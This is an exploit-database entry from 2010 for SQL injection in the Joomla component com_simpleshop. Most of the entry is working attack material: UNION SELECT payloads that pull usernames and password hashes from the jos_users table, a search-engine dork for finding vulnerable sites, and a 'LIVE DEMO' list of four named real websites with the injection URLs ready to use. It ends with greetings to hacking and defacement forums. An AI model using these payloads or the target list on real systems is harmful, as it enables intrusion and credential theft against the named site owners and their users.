Joomla Component com_simpleshop SQL injection Vulnerability

2010-04-17T00:00:00
ID 1337DAY-ID-11851
Type zdt
Reporter Sudden_death
Modified 2010-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Joomla Component com_simpleshop SQL injection Vulnerability 
===========================================================

# Exploit Title     : joomla component simpleshop SQL injection Vulnerability
# Date              : 17 april 2010
# Author            : Sudden_death ([email protected])
# Software Link     : N/A
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://suddendeath.000space.com/
# dork              : inurl:option=com_simpleshop
# Code                 : -1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
======================================================================
 
# EXPLOIT / c0de

-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
 
 
# VULN IN HERE
 
http://localhost/joomla/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=[c0de}
 
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]
 
[SQL]:
 
id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
 
Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- 
 
# LIVE DEMO
 
http://restrive.co.za/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://www.textusllc.com/site/index.php?option=com_simpleshop&task=browse&Itemid=92&catid=-3%20UNION%20SELECT%201,username,3,4,password,6,7,8%20from%20jos_users--
http://www.dpisb.com/cms/index.php?option=com_simpleshop&task=browse&Itemid=115&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://gfhomebrewing.com.au/index.php?option=com_simpleshop&task=browse&Itemid=31&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
 
[#]-------------------------------------------------------------------
 
GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
 
[#]-------------------------------------------------------------------
 
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
 
[#]-------------------------------------------------------------------
 
note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!



#  0day.today [2018-04-08]  #